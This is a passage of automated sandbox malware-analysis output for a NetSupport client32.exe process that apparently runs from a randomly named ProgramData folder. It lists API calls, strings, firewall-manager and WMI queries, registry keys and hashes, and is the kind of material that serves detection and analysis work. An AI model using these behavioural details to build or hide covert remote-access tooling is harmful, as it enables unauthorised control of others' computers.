                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
                                                                                                • String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
                                                                                                • API String ID: 3494822531-1878648853
                                                                                                • Opcode ID: 1e9a8547f1a4d8db54bad5cbccf33acd14b41b9136434f7006fca57feb396e97
                                                                                                • Instruction ID: 9d2f35c0ca678663173c9787aa50c950699104b7f99c1a06bf1b906e54d037ce
                                                                                                • Opcode Fuzzy Hash: 1e9a8547f1a4d8db54bad5cbccf33acd14b41b9136434f7006fca57feb396e97
                                                                                                • Instruction Fuzzy Hash: F3515E76D0422E9BEB15CF24DC50BDDF7B4AF15708F6001A4DC897B681EB716A88CB91
                                                                                                APIs
                                                                                                • _calloc.LIBCMT ref: 69CF2FBB
                                                                                                • GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,962D34B3,00000000), ref: 69CF300D
                                                                                                • InterlockedExchange.KERNEL32(-00039761,00000000,?,?,?,?,?,?,?,?,962D34B3,00000000), ref: 69CF301B
                                                                                                • _calloc.LIBCMT ref: 69CF303B
                                                                                                • _memmove.LIBCMT ref: 69CF3049
                                                                                                • InterlockedDecrement.KERNEL32(-000397B9,?,?,?,?,?,?,?,?,?,?,?,?,?,?,962D34B3), ref: 69CF307F
                                                                                                • SetEvent.KERNEL32(0000017C,?,?,?,?,?,?,?,?,?,?,?,?,?,?,962D34B3), ref: 69CF308C
                                                                                                  • Part of subcall function 69CF28D0: wsprintfA.USER32 ref: 69CF2965
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Interlocked_calloc$CountDecrementEventExchangeTick_memmovewsprintf
                                                                                                • String ID:
                                                                                                • API String ID: 3178096747-0
                                                                                                • Opcode ID: cc229f2baad0a9995c5465ff87dadd193f183d0d95f5e1383e3a56ee4e274ef1
                                                                                                • Instruction ID: 3ff67e30b99e639339dd18ccdcba14779d83dd0b3bbf0ebdb30c4e91a617f5a5
                                                                                                • Opcode Fuzzy Hash: cc229f2baad0a9995c5465ff87dadd193f183d0d95f5e1383e3a56ee4e274ef1
                                                                                                • Instruction Fuzzy Hash: 214141B6D00209AFDB40CFA9D944AEEB7B8BF4C344F40C52AE519E7240F771A645CBA1
                                                                                                APIs
                                                                                                • IsJPIK.PCICHEK(986DAFD2,NSM.LIC,?,1102F092,View,Client,Bridge), ref: 1102A6F6
                                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                  • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free_malloc_memsetwsprintf
                                                                                                • String ID: IKS$NSM.LIC$Serial_no$_License$iks.lic
                                                                                                • API String ID: 2814900446-469156069
                                                                                                • Opcode ID: 0379ce3942a913bb4027790b25de064647e56b8370c3ae96010eb9a0c27bd6db
                                                                                                • Instruction ID: 268b58c6f7511c145cb41d8ae554306eba274149ba0ed4ca5467e6687dcac3b5
                                                                                                • Opcode Fuzzy Hash: 0379ce3942a913bb4027790b25de064647e56b8370c3ae96010eb9a0c27bd6db
                                                                                                • Instruction Fuzzy Hash: 8931AF35E01729ABDB00CFA8CC81BEEFBF4AB49714F104299E826A72C0DB756940C791
                                                                                                APIs
                                                                                                • RtlDecodePointer.NTDLL(?,?,?,?,?,11163DB6,?,111DCCE0,0000000C,11163DE2,?,?,1116E4BB,11177F11), ref: 11163CC7
                                                                                                • DecodePointer.KERNEL32(?,?,?,?,?,11163DB6,?,111DCCE0,0000000C,11163DE2,?,?,1116E4BB,11177F11), ref: 11163CD4
                                                                                                • __realloc_crt.LIBCMT ref: 11163D11
                                                                                                • __realloc_crt.LIBCMT ref: 11163D27
                                                                                                • EncodePointer.KERNEL32(00000000,?,?,?,?,?,11163DB6,?,111DCCE0,0000000C,11163DE2,?,?,1116E4BB,11177F11), ref: 11163D39
                                                                                                • EncodePointer.KERNEL32(?,?,?,?,?,?,11163DB6,?,111DCCE0,0000000C,11163DE2,?,?,1116E4BB,11177F11), ref: 11163D4D
                                                                                                • EncodePointer.KERNEL32(-00000004,?,?,?,?,?,11163DB6,?,111DCCE0,0000000C,11163DE2,?,?,1116E4BB,11177F11), ref: 11163D55
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Pointer$Encode$Decode__realloc_crt
                                                                                                • String ID:
                                                                                                • API String ID: 4108716018-0
                                                                                                • Opcode ID: 78b66c0ccf40e1ea873e96cc16d33ba7024ac8dccc44993d1929be3c3bf886a8
                                                                                                • Instruction ID: 9b559eab580439f7d32e9cac7dbac1f1bc4b8bf1504d6bec0d436b7e194fb771
                                                                                                • Opcode Fuzzy Hash: 78b66c0ccf40e1ea873e96cc16d33ba7024ac8dccc44993d1929be3c3bf886a8
                                                                                                • Instruction Fuzzy Hash: EA11D632518236AFDB005F79DCD488EFBEDEB41268751043AE819D7211EBB2ED54DB80
                                                                                                APIs
                                                                                                • WaitForSingleObject.KERNEL32(0000018C,000000FF), ref: 1101792C
                                                                                                • CoInitialize.OLE32(00000000), ref: 11017935
                                                                                                • _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101795C
                                                                                                • CoUninitialize.OLE32 ref: 110179C0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                                • String ID: PCSystemTypeEx$Win32_ComputerSystem
                                                                                                • API String ID: 2407233060-578995875
                                                                                                • Opcode ID: 0942cf205f413e43a7dce2a9957458248f39d685d8b5fb2cae19ac9a1649f750
                                                                                                • Instruction ID: 979ee595df3e366e36f6db43f9274242a875182caa54ddfda208ac7f01cc4ef4
                                                                                                • Opcode Fuzzy Hash: 0942cf205f413e43a7dce2a9957458248f39d685d8b5fb2cae19ac9a1649f750
                                                                                                • Instruction Fuzzy Hash: BE213EB5D0166A9FDB11CFA48C40BBAB7E99F4170CF0000B4EC59DB188EB79D544D791
                                                                                                APIs
                                                                                                • WaitForSingleObject.KERNEL32(0000018C,000000FF), ref: 11017842
                                                                                                • CoInitialize.OLE32(00000000), ref: 1101784B
                                                                                                • _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017872
                                                                                                • CoUninitialize.OLE32 ref: 110178D0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                                • String ID: ChassisTypes$Win32_SystemEnclosure
                                                                                                • API String ID: 2407233060-2037925671
                                                                                                • Opcode ID: 645120171e4998cce48753e45b0062292f56c9bef21460c25a07f93c3742c313
                                                                                                • Instruction ID: 35f99737241494c501e89beb979cd88c9c6eddc8ed8b09fe319fdcc96c080ea2
                                                                                                • Opcode Fuzzy Hash: 645120171e4998cce48753e45b0062292f56c9bef21460c25a07f93c3742c313
                                                                                                • Instruction Fuzzy Hash: D7210875D4112A9BD711CFA4CD40BAEBBE89F40309F0000A4EC29DB244EE75D910C7A0
                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32(756F13E0,1103070D,Client,UseIPC,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 1113962A
                                                                                                • GetTickCount.KERNEL32(756F13E0,1103070D,Client,UseIPC,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11139631
                                                                                                Strings
                                                                                                • AutoICFConfig, xrefs: 11139650
                                                                                                • DesktopTimerProc - Further ICF config checking will not be performed, xrefs: 111396EC
                                                                                                • Client, xrefs: 11139655
                                                                                                • DoICFConfig() OK, xrefs: 111396D6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CountTick
                                                                                                • String ID: AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK
                                                                                                • API String ID: 536389180-1512301160
                                                                                                • Opcode ID: e88b596b7c5c4cd1ec5207dbc2eaab29f042a609f248b0ca23653edaa92bfa31
                                                                                                • Instruction ID: a12453e9faa0d912da9f55e5525ca7a81223e7cd1b6d2efb44fc6fc6c8488c0a
                                                                                                • Opcode Fuzzy Hash: e88b596b7c5c4cd1ec5207dbc2eaab29f042a609f248b0ca23653edaa92bfa31
                                                                                                • Instruction Fuzzy Hash: 2B21277CA262AF4AFB12CE75DED4791FA92278232EF010178D515862CCFBB49448CF46
                                                                                                APIs
                                                                                                • send.WSOCK32(?,?,?,00000000), ref: 69CE9C93
                                                                                                • timeGetTime.WINMM ref: 69CE9CD0
                                                                                                • Sleep.KERNEL32(00000000), ref: 69CE9CDE
                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 69CE9D4F
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 69CE9D72
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalIncrementInterlockedLeaveSectionSleepTimesendtime
                                                                                                • String ID: 3'
                                                                                                • API String ID: 77915721-280543908
                                                                                                • Opcode ID: ae9c6ab9ac68420c14e6cabe3168a21ac3b6aa977af58346f62a363bd5e66797
                                                                                                • Instruction ID: 89dc8e9f7db6ba014ab0ee258dd0ea7b3812b404d618d0622bdbd17022587388
                                                                                                • Opcode Fuzzy Hash: ae9c6ab9ac68420c14e6cabe3168a21ac3b6aa977af58346f62a363bd5e66797
                                                                                                • Instruction Fuzzy Hash: 2F218175A041288FEB20DF64DD99B9AB7B4BF05364F0182D5D90E97241E730ED85CF91
                                                                                                APIs
                                                                                                • CoInitialize.OLE32(00000000), ref: 11096DA4
                                                                                                • CLSIDFromProgID.OLE32(HNetCfg.FwMgr,?), ref: 11096DBE
                                                                                                • CoCreateInstance.OLE32(?,00000000,00000001,111C1B4C,?), ref: 11096DDB
                                                                                                • CoUninitialize.OLE32 ref: 11096DF9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateFromInitializeInstanceProgUninitialize
                                                                                                • String ID: HNetCfg.FwMgr$ICF Present:
                                                                                                • API String ID: 3222248624-258972079
                                                                                                • Opcode ID: 2f37d598b4012c0c7ec1fc3c7a41f1831d77099e3c9549bb0708a0a7a71d465f
                                                                                                • Instruction ID: 9199824aa3bd6ebf99e58618a68c234682766c17c5e3bd8f83aabb27c1d0aea9
                                                                                                • Opcode Fuzzy Hash: 2f37d598b4012c0c7ec1fc3c7a41f1831d77099e3c9549bb0708a0a7a71d465f
                                                                                                • Instruction Fuzzy Hash: BC11C235F4111DABC700EFA59C84EEFFF789F44705B500468E51ADB104EA25A980C7E1
                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026306
                                                                                                • K32GetProcessImageFileNameA.KERNEL32(?,00000000,11030983,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026322
                                                                                                • GetProcAddress.KERNEL32(?,GetModuleFileNameExA,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026336
                                                                                                • SetLastError.KERNEL32(00000078,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026359
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$ErrorFileImageLastNameProcess
                                                                                                • String ID: GetModuleFileNameExA$GetProcessImageFileNameA
                                                                                                • API String ID: 4186647306-532032230
                                                                                                • Opcode ID: 168c0276823b5447779d0ea544bca84f700d76740b4f854a777d5a44096f3b0a
                                                                                                • Instruction ID: 183e1746e0b9fc2934bd9ec846e99aaf72a90bbb460a81bb2001b4ad07131d97
                                                                                                • Opcode Fuzzy Hash: 168c0276823b5447779d0ea544bca84f700d76740b4f854a777d5a44096f3b0a
                                                                                                • Instruction Fuzzy Hash: BE012D72A41319ABE720DEA5EC44F4BB7E8EB88765F40452AF955D7600D630E8048BA0
                                                                                                APIs
                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,774E42C0,00000000,?,11110F55,11110AF0,00000001,00000000), ref: 11110057
                                                                                                • CreateThread.KERNEL32(00000000,11110F55,00000001,00000000,00000000,0000000C), ref: 1111007A
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,11110F55,11110AF0,00000001,00000000,?,?,?,?,?,11031700), ref: 111100A7
                                                                                                • CloseHandle.KERNEL32(?), ref: 111100B1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                • String ID: ..\ctl32\Refcount.cpp$hThread
                                                                                                • API String ID: 3360349984-1136101629
                                                                                                • Opcode ID: 4687833a1936dd26f91b2846a9cb7115301389be075d2048120d977a93bdefe6
                                                                                                • Instruction ID: 76930d23ba1481c48ceb924dc08d7adf498fcac35268297604c83f904cd53e19
                                                                                                • Opcode Fuzzy Hash: 4687833a1936dd26f91b2846a9cb7115301389be075d2048120d977a93bdefe6
                                                                                                • Instruction Fuzzy Hash: A0018435780715BFF3208EA5CD85F57FBA9DB45765F104138FA259B6C4D670E8048BA0
                                                                                                APIs
                                                                                                • RegOpenKeyExA.KERNEL32(80000002,System\CurrentControlSet\Control\GraphicsDrivers\DCI,00000000,0002001F,?), ref: 11116D7F
                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 11116DB7
                                                                                                • RegSetValueExA.ADVAPI32(00000000,Timeout,00000000,00000004,00000000,00000004), ref: 11116DD3
                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 11116DDD
                                                                                                  • Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32 ref: 11143BF0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseValue$OpenQuery
                                                                                                • String ID: System\CurrentControlSet\Control\GraphicsDrivers\DCI$Timeout
                                                                                                • API String ID: 3962714758-504756767
                                                                                                • Opcode ID: 71a3d5382f694e300ca8b739a0447eaf7c0fd6e11b25d11c78922669bca80467
                                                                                                • Instruction ID: 446fff0cae762a3aa9587799f73bfd878db9d5469a1de9e4663b70f0b9132e6a
                                                                                                • Opcode Fuzzy Hash: 71a3d5382f694e300ca8b739a0447eaf7c0fd6e11b25d11c78922669bca80467
                                                                                                • Instruction Fuzzy Hash: 9E019E75640208BBEB14DBA0CE49FEEF77CAF04705F108158FE14AA5C5DBB0AA04CB65
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: wsprintf
                                                                                                • String ID: %s%s%s.bin$445817$_HF$_HW$_SW
                                                                                                • API String ID: 2111968516-1929130765
                                                                                                • Opcode ID: 503f2c815b640c3d0002ea6c51c91ecd6f409461de15ff16a7ff97f3048ceaf6
                                                                                                • Instruction ID: fa910be19caf0a14a4f119543ead50e584fafd0cecff00e00c2366bf95bcdf21
                                                                                                • Opcode Fuzzy Hash: 503f2c815b640c3d0002ea6c51c91ecd6f409461de15ff16a7ff97f3048ceaf6
                                                                                                • Instruction Fuzzy Hash: 2AE092A4E5460C9BF300A6498C11BAAFACC174475BFC4C051BFF9AB6A3E9299904C6D2
                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32 ref: 69CF6950
                                                                                                  • Part of subcall function 69CF7BE0: _memset.LIBCMT ref: 69CF7BFF
                                                                                                  • Part of subcall function 69CF7BE0: _strncpy.LIBCMT ref: 69CF7C0B
                                                                                                  • Part of subcall function 69CEA4E0: EnterCriticalSection.KERNEL32(69D2B898,00000000,?,?,?,69CEDA7F,?,00000000), ref: 69CEA503
                                                                                                  • Part of subcall function 69CEA4E0: InterlockedExchange.KERNEL32(?,00000000,?,69CEDA7F,?,00000000), ref: 69CEA568
                                                                                                  • Part of subcall function 69CEA4E0: Sleep.KERNEL32(00000000,?,69CEDA7F,?,00000000), ref: 69CEA581
                                                                                                  • Part of subcall function 69CEA4E0: LeaveCriticalSection.KERNEL32(69D2B898,00000000), ref: 69CEA5B3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$CountEnterExchangeInterlockedLeaveSleepTick_memset_strncpy
                                                                                                • String ID: 1.2$Channel$Client$Publish %d pending services
                                                                                                • API String ID: 1112461860-1140593649
                                                                                                • Opcode ID: 981df005e2695a56ef723d3a15a0fb9031ec4c99479043e909b26e47c99226df
                                                                                                • Instruction ID: b7119fa229493fa7b199ef42b6da21b59be3a70fe851758b36aebd623184a6a9
                                                                                                • Opcode Fuzzy Hash: 981df005e2695a56ef723d3a15a0fb9031ec4c99479043e909b26e47c99226df
                                                                                                • Instruction Fuzzy Hash: 4B51D375A04A898BFF10CB78FA5179A37A4BF06318F10C179DA5293281FB31D946D7A1
                                                                                                APIs
                                                                                                • GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 11103683
                                                                                                • GetStockObject.GDI32(00000004), ref: 111036DB
                                                                                                • RegisterClassA.USER32(?), ref: 111036EF
                                                                                                • CreateWindowExA.USER32 ref: 1110372C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AtomClassCreateGlobalObjectRegisterStockWindow
                                                                                                • String ID: NSMDesktopWnd
                                                                                                • API String ID: 2669163067-206650970
                                                                                                • Opcode ID: 3079baf332cc25a70c3d3df9c832fc0325efe936172018c4c3e6d8e20cf8610c
                                                                                                • Instruction ID: a046934e961b92c42b42225909fe4a4d9db65d03d00dbebfa88e6fdde24b4f4f
                                                                                                • Opcode Fuzzy Hash: 3079baf332cc25a70c3d3df9c832fc0325efe936172018c4c3e6d8e20cf8610c
                                                                                                • Instruction Fuzzy Hash: E031F4B4D01719AFCB44CFA9D980AAEFBF8FB08314F50462EE42AE3244E7355900CB94
                                                                                                APIs
                                                                                                • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?), ref: 11145F70
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 11145FD4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseOpen
                                                                                                • String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
                                                                                                • API String ID: 47109696-3245241687
                                                                                                • Opcode ID: 1e58ccc398f601655cd21bbef7fe8258e694ae66d2ba0236151b0d49e381710a
                                                                                                • Instruction ID: 1d1f817806b548678a0140876f7b35b9e852c49707e53231e183cf95c3cf5809
                                                                                                • Opcode Fuzzy Hash: 1e58ccc398f601655cd21bbef7fe8258e694ae66d2ba0236151b0d49e381710a
                                                                                                • Instruction Fuzzy Hash: 1E21DD71E0022A9BE764DA64CD80FDEF778AB45718F1041AAE81DF3941D7319D458BA3
                                                                                                APIs
                                                                                                  • Part of subcall function 11112140: GetSystemDirectoryA.KERNEL32(?,00000104,?), ref: 1111216A
                                                                                                  • Part of subcall function 11112140: __wsplitpath.LIBCMT ref: 11112185
                                                                                                  • Part of subcall function 11112140: GetVolumeInformationA.KERNEL32 ref: 111121B9
                                                                                                • GetComputerNameA.KERNEL32(?,?), ref: 11112288
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
                                                                                                • String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
                                                                                                • API String ID: 806825551-1858614750
                                                                                                APIs
                                                                                                  • Part of subcall function 111447F0: GetCurrentProcess.KERNEL32(11029A9F,?,11144A43,?), ref: 111447FC
                                                                                                  • Part of subcall function 111447F0: GetModuleFileNameA.KERNEL32(00000000,C:\ProgramData\i99ekubc\client32.exe,00000104,?,11144A43,?), ref: 11144819
                                                                                                • WaitForMultipleObjects.KERNEL32 ref: 11144E25
                                                                                                • ResetEvent.KERNEL32(00000128), ref: 11144E39
                                                                                                • SetEvent.KERNEL32(00000128), ref: 11144E4F
                                                                                                • WaitForMultipleObjects.KERNEL32 ref: 11144E5E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
                                                                                                • String ID: MiniDump
                                                                                                • API String ID: 1494854734-2840755058
                                                                                                APIs
                                                                                                  • Part of subcall function 69CE5000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA,00000000,?,69CE8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 69CE5014
                                                                                                  • Part of subcall function 69CE5000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,69CE8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 69CE5034
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 69CE8EAE
                                                                                                • FreeLibrary.KERNEL32(?), ref: 69CE8EBF
                                                                                                  • Part of subcall function 69CE2420: _strrchr.LIBCMT ref: 69CE242E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressCloseFileFreeHandleLibraryModuleNameProc_strrchr
                                                                                                • String ID: NSM247Ctl.dll$Set Is247=%d$pcictl_247.dll
                                                                                                • API String ID: 3215810784-3459472706
                                                                                                APIs
                                                                                                • LoadStringA.USER32 ref: 111479DF
                                                                                                • wsprintfA.USER32 ref: 11147A16
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: wsprintf$ErrorExitLastLoadMessageProcessString
                                                                                                • String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
                                                                                                • API String ID: 1985783259-2296142801
                                                                                                APIs
                                                                                                • _malloc.LIBCMT ref: 111101C9
                                                                                                  • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                                  • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                                  • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                                                • wsprintfA.USER32 ref: 111101E4
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                • _memset.LIBCMT ref: 11110207
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: wsprintf$AllocateErrorExitHeapLastMessageProcess_malloc_memset
                                                                                                • String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
                                                                                                • API String ID: 3234921582-2664294811
                                                                                                APIs
                                                                                                • wsprintfA.USER32 ref: 11031FE6
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
